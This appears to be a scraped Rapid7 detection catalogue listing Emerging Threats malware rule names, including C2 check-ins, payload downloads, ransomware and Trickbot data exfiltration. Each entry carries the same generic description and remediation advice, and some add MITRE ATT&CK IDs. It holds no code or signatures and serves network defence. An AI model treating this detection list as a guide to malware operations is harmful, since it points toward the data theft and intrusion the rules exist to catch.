ET MALWARE Probable OneLouder downloader (Zeus P2P)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Probable OneLouder downloader (Zeus P2P)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Probable OneLouder downloader (Zeus P2P)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Probable OneLouder downloader (Zeus P2P)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Probable OneLouder downloader (Zeus P2P)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Project Plague CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ProxyBot Phone Home Traffic

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ProxyBox - HTTP CnC - botinfo.php

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ProxyBox - HTTP CnC - .com.tw/check_version.php

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ProxyBox - HTTP CnC - getiplist.php

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ProxyBox - HTTP CnC - get_servers.php

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ProxyBox - HTTP CnC - POST 1-letter.php

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ProxyBox - HTTP CnC - proxy_info.php

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Proxychecker Lookup

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Proyecto RAT Variant - Yopmail Login attempt (set)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Proyecto RAT Variant - Yopmail Stage 2 CnC Retrieval

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PS/Beapy CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PSEmpire Checkin via POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PS/SunCrypt Ransomware CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE PS/Unk.EB.Spreader CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Pteranodon Backdoor Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Pteranodon Backdoor CnC POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Pteranodon Variant 1 Backdoor Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Pteranodon Variant 2 Backdoor Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Pteranodon Variant 3 Backdoor Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PT MALWARE] Hacked Mikrotik C2 Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Adwind SSL Certificate Observed

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Donut Ransomware CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE [PTsecurity] Fake SSL Certificate Observed (Google)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Fake SSL Certificate Observed (Oracle America)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Fake SSL Certificate Observed (Oracle canada)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Fake SSL Certificate Observed (Yahoo)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Gozi/Ursnif Payload v12

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Gozi/Ursnif Payload v14

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] JS.Trojan-Downloader.Nemucod.yo HTTP POST (:Exec:)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Kraken Ransomware Start Activity 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE [PTsecurity] Kuriyama Loader Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] MSIL/Biskvit.A Check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Paradise Ransomware Check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE [PTsecurity] Possible Backdoor.Win32.TeamBot / RTM C2 Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Possible Cobalt Strike payload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Possible Malicious (HTA-VBS-PowerShell) obfuscated command

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Possible Trojan.Downloader UserAgent (binary_getter)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] PS/TrojanDownloader.Agent.NNR XORed Zip payload (key 0x91)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Tinba (Banking Trojan) HTTP Header

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Tinba Checkin 4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Trickbot Data Exfiltration

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Trojan.Downloader VBA Script obfuscation (binary_getter)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Trojan.JS.Agent.dwz Checkin 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Trojan.JS.Agent.dwz Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] TR/Spy.Banker.agdtw Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Ursnif Encoded Payload Inbound

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] W32/Rodecap.StealRat C2 Payload (GIF)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] WeChat (Ransomware/Stealer) HttpHeader

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE [PTsecurity] Win32/Ramnit Stage 0 Communicating with CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Win32/Randrew!rfn CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Win32/SocStealer.Socelars C2 Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Win32/Spy.Agent.PMJ (MICROPSIA)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Win32/SpyAgent.Raptor (realtime-spy) CnC activity 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Win32/SpyAgent.Raptor (realtime-spy) CnC activity 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Win32/Spy.RTM/Redaman IP Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [PTsecurity] Win32/TinyNuke Payload ACF40 Inbound

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Pult Downloader Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PunkeyPOS HTTP CnC Beacon 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE PunkeyPOS HTTP CnC Beacon 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE PunkeyPOS HTTP CnC Beacon 3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE PunkeyPOS HTTP CnC Beacon 4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE PunkeyPOS HTTP CnC Beacon 9

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE PunkeyPOS HTTP CnC Beacon Fake UA

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Punto Loader Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PurpleFox Backdoor/Rootkit Download Request M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PurpleFox Backdoor/Rootkit Download Request M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PurpleFox Backdoor/Rootkit Download Server Response M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PurpleFox Backdoor/Rootkit Download Server Response M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PurpleFox Backdoor/Rootkit Download Server Response M3

Description
Copy link

Recommendation
Copy link

ET MALWARE PurpleFox Backdoor/Rootkit Download Server Response M4

Description
Copy link

Recommendation
Copy link

ET MALWARE PurpleFox EK Landing Page Domain in SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Pushdo.S CnC response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Pushdo Update URL Detected

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Putter Panda HTTPClient CnC HTTP Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PWSteal.Bancos Generic Banker Trojan SCR Download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PWS.Win32/Daceluw.A Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PXJ Ransomware CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Py/Beapy CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Py/MechaFlounder CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Python/PBot Browser Hijacker Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Python.Ragua Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Qarallax RAT Downloading Modules

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Qtloader encrypted check-in Oct 19 M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Quant Loader Download Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Quant Loader Download Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Quant Loader Download Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Quant Loader Download Response M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Qudox CnC Actiivty

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE r0 CnC Architecture GET 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE r0 CnC Architecture GET 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE r0 CnC Architecture GET 3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE r0 CnC Architecture GET 4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE r0 CnC Architecture POST 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE r0 CnC Architecture POST 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE r0 CnC Architecture POST 3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE r0 CnC Architecture POST 4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE r0 CnC Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE r0 CnC Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE r0 CnC GET

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE r0 CnC POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE r0 CnC Report GET

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE r0 CnC Report POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

